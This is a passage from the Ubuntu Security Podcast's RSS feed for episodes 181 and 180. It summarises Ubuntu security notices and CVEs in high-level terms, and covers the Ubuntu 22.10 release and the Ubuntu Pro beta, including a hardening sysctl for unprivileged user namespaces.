<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0812">CVE-2022-0812</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5570-2-zlib-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5570-2">USN-5570-2</a>] zlib vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37434">CVE-2022-37434</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5685-1-frr-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5685-1">USN-5685-1</a>] FRR vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37035">CVE-2022-37035</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37032">CVE-2022-37032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5686-1-git-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5686-1">USN-5686-1</a>] Git vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39260">CVE-2022-39260</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39253">CVE-2022-39253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5687-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5687-1">USN-5687-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0812">CVE-2022-0812</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5688-1-libksba-vulnerability-01-24">[<a href="https://ubuntu.com/security/notices/USN-5688-1">USN-5688-1</a>] Libksba vulnerability [01:24]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3515">CVE-2022-3515</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libksba library used to parse and build ASN.1 objects contained within S/MIME,
X.509 certificates etc</li>
<li>ASN.1 supports various encoding formats - BER, DER (basic and distinguised
encoding rules respectively)</li>
<li>Both use a tag-length-value scheme to encode objects</li>
<li>When copying these objects around, would copy both a header as well as the
object itself - if an object was really large, the sum of the header size plus
the object would overflow - allowing a size check to be bypassed (since when
overflowing wraps around to be a small sized integer)</li>
<li>Integer overflow leading to a buffer overflow</li>
<li>Considered a severe bug by upstream</li>
<li>in Ubuntu is used by gpgsm (used to handled SMIME signed data) and dirmngr -
responsible for parsing and loading CRLS and verifying certs used by TLS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-22-dot-10-kinetic-kudu-release-04-02">Ubuntu 22.10 Kinetic Kudu release [04:02]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/canonical-releases-ubuntu-22-10-kinetic-kudu">https://ubuntu.com/blog/canonical-releases-ubuntu-22-10-kinetic-kudu</a></li>
<li>kernel 5.19
<ul>
<li>security wise</li>
<li>Faster RNG (entropy extraction switched from SHA1 to BLAKE2)</li>
<li>Support for Intel Trust Domain Extensions (TDX)
<ul>
<li>successor to SGX, builds on lessons learned</li>
<li>virtualisation based confidential computing environment
<ul>
<li>equivalent to an SGX enclave</li>
<li>uses a new processor mode called SEAM</li>
</ul>
</li>
<li>allows to deploy legacy applications without having to adapt them a
different programming model as was done for SGX</li>
</ul>
</li>
</ul>
</li>
<li>AppArmor support for posix-mq and unprivileged user namespace mediation
<ul>
<li>idea is that only applications which are running under an AppArmor profile
with permission to user userns will be able to - unconfined will not -
this kernel configuration is disabled by default but can be enabled via a
sysctl:</li>
<li>then unconfined applications will not be able to use them</li>
<li>helps limit an attack surface for exploits - 4 out of 5 pwn2own exploits
against Ubuntu this year used unprivileged userns as part of their attack
chain</li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span></code></pre></div><ul>
<li>Desktop
<ul>
<li>pipewire is now default instead of pulseaudio - improved bluetooth handling</li>
<li>GNOME 43 - gedit replaced by gnome-text-editor, gnome-terminal still there
but likely will be new gnome-console in 23.04</li>
<li>LibreOffice 7.4</li>
<li>FF 106/ TB 102</li>
<li>Updated bluez, CUPS, network-manager, Mesa 22 etc</li>
</ul>
</li>
<li>Server
<ul>
<li>socket-activated SSH daemon to reduce memory footprint inside containers etc</li>
<li>improved support for integration with Windows Server w/ LDAP channel binding and LDAP signing in cyrus-sasl2</li>
<li>bind9 support for remote TLS verification in both <code>named</code> and <code>dig</code> to allow to implement strict and mutual TLS authentication</li>
<li>updated containerd, runc, docker.io</li>
<li>updated qemu - improved emulation of RISC-V, s390x</li>
<li>updated libvirt - ppc64 Power10 processor support</li>
</ul>
</li>
<li>For developers:
<ul>
<li>debuginfod</li>
<li>updated gcc, Go, Ruby and Rust toolchains</li>
</ul>
</li>
</ul>
<h3 id="canonical-product-roadmap-plus-engineering-sprints-plus-ubuntu-summit-12-32">Canonical Product Roadmap + Engineering Sprints + Ubuntu Summit [12:32]</h3>
<ul>
<li>No podcast for the next 3 weeks</li>
</ul>
<h3 id="thanks-and-farewell-to-shaun-murphy-13-45">Thanks and farewell to Shaun Murphy [13:45]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E181.mp3" length="15819036" type="audio/mpeg" /><itunes:duration>879</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 180
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-180/</link>
          <pubDate>Fri, 14 Oct 2022 16:30:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>360807e8b17230ed2504da3edd48d1b4818a29016f34e960de08d0f5b010eb83d45a90b65f68faf7b5d3f987df13b5564e7c58210f180d6810dbadd85880812d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 180</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu Pro beta is announced and we cover all the details with Lech Sandecki and
  Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird,
  LibreOffice, the Linux kernel, .NET 6 and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu Pro beta is announced and we cover all the details with Lech Sandecki and
  Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird,
  LibreOffice, the Linux kernel, .NET 6 and more.
  </itunes:summary>
        <description>  Ubuntu Pro beta is announced and we cover all the details with Lech Sandecki and
  Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird,
  LibreOffice, the Linux kernel, .NET 6 and more.
  </description>
        <googleplay:description>  Ubuntu Pro beta is announced and we cover all the details with Lech Sandecki and
  Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird,
  LibreOffice, the Linux kernel, .NET 6 and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu Pro beta is announced and we cover all the details with Lech Sandecki and
Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird,
LibreOffice, the Linux kernel, .NET 6 and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>49 unique CVEs addressed</p>
<h3 id="usn-5658-1-dhcp-vulnerabilities-00-53">[<a href="https://ubuntu.com/security/notices/USN-5658-1">USN-5658-1</a>] DHCP vulnerabilities [00:53]</h3>
<ul>
<li>
<p>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2929">CVE-2022-2929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2928">CVE-2022-2928</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>
<p>2 different DoS against ISC DHCP server</p>
<ul>
<li>a client could send a lease query to the server</li>
</ul>
<p>which would fail to properly decrement a reference count and hence eventually
could overflow the reference counter -&gt; abort -&gt; DoS</p>
<ul>
<li>memory leak could be triggered by a client sending a crafted DHCP packet
with a FQDN label longer than 64 bytes - eventually would run out of memory
-&gt; crash -&gt; DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-5659-1-kitty-vulnerabilities-01-45">[<a href="https://ubuntu.com/security/notices/USN-5659-1">USN-5659-1</a>] kitty vulnerabilities [01:45]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41322">CVE-2022-41322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35605">CVE-2020-35605</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Cross-platform, fast, feature-rich, GPU based terminal</li>
<li>Includes support for image display, but if it failed to read an image file
then would display an error message containing the file name - as such, could
craft the name of the filename to then inject terminal control characters and
hence arbitrary input into the shell itself and hence execute arbitrary
code</li>
<li>Also supports showing <a href="https://sw.kovidgoyal.net/kitty/desktop-notifications/">desktop notifications via OSC escape codes</a> - ie. a shell
script or even a file could output these and kitty would interpret that to
show a desktop notification. Also includes support for actions on
notifications through a named notification id. However, would also fail to
sanitize these ids, again allowing terminal control characters to be injected
and hence arbitrary code to be executed <strong>if</strong> the user were to then click on a
notification popup
<ul>
<li>requires an attacker can get the user to display arbitrary content, and then
for the user to click the notification</li>
</ul>
</li>
</ul>
<h3 id="usn-5657-1-graphite2-vulnerability-03-16">[<a href="https://ubuntu.com/security/notices/USN-5657-1">USN-5657-1</a>] Graphite2 vulnerability [03:16]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7999">CVE-2018-7999</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL pointer deref via crafted ttf</li>
</ul>
<h3 id="usn-5663-1-thunderbird-vulnerabilities-03-27">[<a href="https://ubuntu.com/security/notices/USN-5663-1">USN-5663-1</a>] Thunderbird vulnerabilities [03:27]</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36059">CVE-2022-36059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3033">CVE-2022-3033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3034">CVE-2022-3034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3032">CVE-2022-3032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38478">CVE-2022-38478</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38477">CVE-2022-38477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38476">CVE-2022-38476</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38473">CVE-2022-38473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38472">CVE-2022-38472</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36319">CVE-2022-36319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36318">CVE-2022-36318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2505">CVE-2022-2505</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>102.2.2</li>
<li>DoS against the inbuilt Matrix client</li>
<li>2 different methods to cause TB to make a network request when an email was
opened - both via html within an iframe - allows sender to track whether the
email was opened etc</li>
<li>Various web framework issues via rendering untrusted content - DoS, mount
pointer and addressbar spoofing, RCE etc</li>
</ul>
<h3 id="usn-5371-3-nginx-vulnerability-04-22">[<a href="https://ubuntu.com/security/notices/USN-5371-3">USN-5371-3</a>] nginx vulnerability [04:22]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3618">CVE-2021-3618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36309">CVE-2020-36309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11724">CVE-2020-11724</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP request smuggling, first covered back in <a href="/episode-157/#usn-5371-1-nginx-vulnerabilities-05-55">[USN-5371-1] nginx vulnerabilities in Episode 157</a></li>
</ul>
<h3 id="usn-5666-1-openssh-vulnerability-04-35">[<a href="https://ubuntu.com/security/notices/USN-5666-1">USN-5666-1</a>] OpenSSH vulnerability [04:35]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41617">CVE-2021-41617</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly drop permissions when executing helper commands for
<code>AuthorizedKeysCommand</code> and <code>AuthorizedPrincipalsCommand</code> and so would run these
with group membership of the sshd process itself (even if configured to run as
a different user)</li>
<li>As such is a form of privilege escalation - low impact since is a non-default
configuration</li>
</ul>
<h3 id="usn-5665-1-pcre-vulnerabilities-05-19">[<a href="https://ubuntu.com/security/notices/USN-5665-1">USN-5665-1</a>] PCRE vulnerabilities [05:19]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-7186">CVE-2017-7186</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6004">CVE-2017-6004</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different OOB read via crafted regexs -&gt; DoS</li>
</ul>
<h3 id="usn-5661-1-libreoffice-vulnerabilities-05-31">[<a href="https://ubuntu.com/security/notices/USN-5661-1">USN-5661-1</a>] LibreOffice vulnerabilities [05:31]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26307">CVE-2022-26307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26306">CVE-2022-26306</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26305">CVE-2022-26305</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Document macros have been a common attack vector for Microsoft Office</li>
<li>To mitigate this, can configure to only execute macros which have a trusted
signature</li>
<li>Failed to properly validate these (would only verify that the certificate for
the signature had the same serial number and issuer string of the trusted
certificate) - instead has to actually compare the hash of the certificate
itself as well</li>
<li>Also has its own password database for storing authentication info for various
web connections</li>
<li>A couple issues existing when encrypting the master key which result in it
being much easier to crack the encryption via a brute force attack than should
otherwise be - a local attacker with access to a user&rsquo;s LibreOffice config
(and hence PW DB) could potentially get access to their credentials as used by
LO</li>
</ul>
<h3 id="usn-5660-1-linux-kernel--gcp--vulnerabilities-07-02">[<a href="https://ubuntu.com/security/notices/USN-5660-1">USN-5660-1</a>] Linux kernel (GCP) vulnerabilities [07:02]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 GCP on Ubuntu 18.04 LTS</li>
<li>Most of these have seen in previous weeks - framebuffer driver OOB when
changing font/screen sizes -&gt; DoS/codeexec, perf race-condition -&gt; UAF -&gt;
DoS/codeexec, netfilter remote DoS via crafted packet causing truncation below
packet header size, lack of good enough IP source port randomisation allows a
malicious TCP server to identify a host by the chosen source port, dm-verity
DoS/code execution by bypassing LoadPin restrictions to load untrusted kernel
modules / firmware (but requires root privileges in the first place)</li>
</ul>
<p>x*** [<a href="https://ubuntu.com/security/notices/USN-5667-1">USN-5667-1</a>] Linux kernel vulnerabilities [08:01]</p>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39189">CVE-2022-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3176">CVE-2022-3176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1882">CVE-2022-1882</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 22.04 GA / 20.04 HWE - generic/clouds/lowlatency/raspi etc</li>
<li>race condition -&gt; UAF in internal pipe impl -&gt; DoS/codeexec</li>
<li>speculative execution vuln - Enhanced Indirect Branch Restricted Speculation
(eIBRS) on some processors did not properly handle RET instructions in some
cases - local attacker could read sensitive info as a result</li>
<li><code>io_uring</code> UAF</li>
<li>netlink xfrm ref counting bug -&gt; underflow -&gt; OOPS -&gt; DoS</li>
<li>Unpriv guest user can compromise guest kernel since KVM failed to properly
handle TLB flushing in some cases</li>
</ul>
<h3 id="usn-5668-1-linux-kernel-vulnerabilities-09-07">[<a href="https://ubuntu.com/security/notices/USN-5668-1">USN-5668-1</a>] Linux kernel vulnerabilities [09:07]</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3176">CVE-2022-3176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4159">CVE-2021-4159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 20.04 GA / 18.04 HWE</li>
<li>More of the same</li>
</ul>
<h3 id="usn-5669-1-usn-5669-2-linux-kernel-vulnerabilities-09-18">[<a href="https://ubuntu.com/security/notices/USN-5669-1">USN-5669-1</a>, <a href="https://ubuntu.com/security/notices/USN-5669-2">USN-5669-2</a>] Linux kernel vulnerabilities [09:18]</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0812">CVE-2022-0812</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 18.04 GA / 16.04 ESM HWE</li>
</ul>
<h3 id="usn-5670-1-dot-net-6-vulnerability-09-27">[<a href="https://ubuntu.com/security/notices/USN-5670-1">USN-5670-1</a>] .NET 6 vulnerability [09:27]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41032">CVE-2022-41032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Patch Tuesday!</li>
<li>EoP via NuGet Client to allow a local attacker to get code execution</li>
</ul>
<h3 id="usn-5671-1-advancecomp-vulnerabilities-09-44">[<a href="https://ubuntu.com/security/notices/USN-5671-1">USN-5671-1</a>] AdvanceCOMP vulnerabilities [09:44]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8383">CVE-2019-8383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8379">CVE-2019-8379</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>recompression utils</li>
<li>NULL ptr deref + heap buffer overflow could be triggered by opening a crafted
files</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-pro-beta-overview-with-lech-sandecki-and-eduardo-barretto-10-08">Ubuntu Pro Beta overview with Lech Sandecki and Eduardo Barretto [10:08]</h3>
<ul>
<li>Hinted at briefly back in <a href="/episode-178/#preparing-for-the-release-of-ubuntu-pro-09-44">Preparing for the release of Ubuntu Pro [09:44]​</a></li>
<li><a href="https://ubuntu.com/blog/ubuntu-pro-beta-release">https://ubuntu.com/blog/ubuntu-pro-beta-release</a></li>
<li><a href="https://ubuntu.com/pro">https://ubuntu.com/pro</a></li>
<li><a href="https://youtu.be/tHXL2_QTRwo">https://youtu.be/tHXL2_QTRwo</a></li>
<li>We want your feedback:
<ul>
<li><a href="https://discourse.ubuntu.com/c/ubuntu-pro/116">https://discourse.ubuntu.com/c/ubuntu-pro/116</a></li>
</ul>
</li>
<li>Lech is hosting a webinar on 25th October 2022 16:00 UTC (5pm UK time, 12pm EDT)
<ul>
<li><a href="https://ubuntu.com/engage/introduction-to-ubuntu-pro">https://ubuntu.com/engage/introduction-to-ubuntu-pro</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E180.mp3" length="33679525" type="audio/mpeg" /><itunes:duration>2148</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 179
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-179/</link>
          <pubDate>Fri, 30 Sep 2022 15:41:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>692ca6f508c5072f1eda71ccf31476668620c1411d074e9da5f45dee699a115207036f8c06df57ad0a4f1ade9f06555bbba2de38b32d7f2f0417cd39ff49881a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 179</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Finer grained control for unprivileged user namespaces is on the horizon for
  Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS,
  Squid and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Finer grained control for unprivileged user namespaces is on the horizon for
  Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS,
  Squid and more.
  </itunes:summary>
        <description>  Finer grained control for unprivileged user namespaces is on the horizon for
  Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS,
  Squid and more.
  </description>
        <googleplay:description>  Finer grained control for unprivileged user namespaces is on the horizon for
  Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS,
  Squid and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Finer grained control for unprivileged user namespaces is on the horizon for
Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS,
Squid and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>37 unique CVEs addressed</p>
<h3 id="usn-5626-2-bind-vulnerabilities-00-40">[<a href="https://ubuntu.com/security/notices/USN-5626-2">USN-5626-2</a>] Bind vulnerabilities [00:40]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38177">CVE-2022-38177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2795">CVE-2022-2795</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-178/#usn-5626-1-bind-vulnerabilities-08-58">[USN-5626-1] Bind vulnerabilities from Episode 178</a></li>
</ul>
<h3 id="usn-5627-1-pcre-vulnerabilities-01-01">[<a href="https://ubuntu.com/security/notices/USN-5627-1">USN-5627-1</a>] PCRE vulnerabilities [01:01]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1587">CVE-2022-1587</a> <!-- raw HTML omitted --></li>
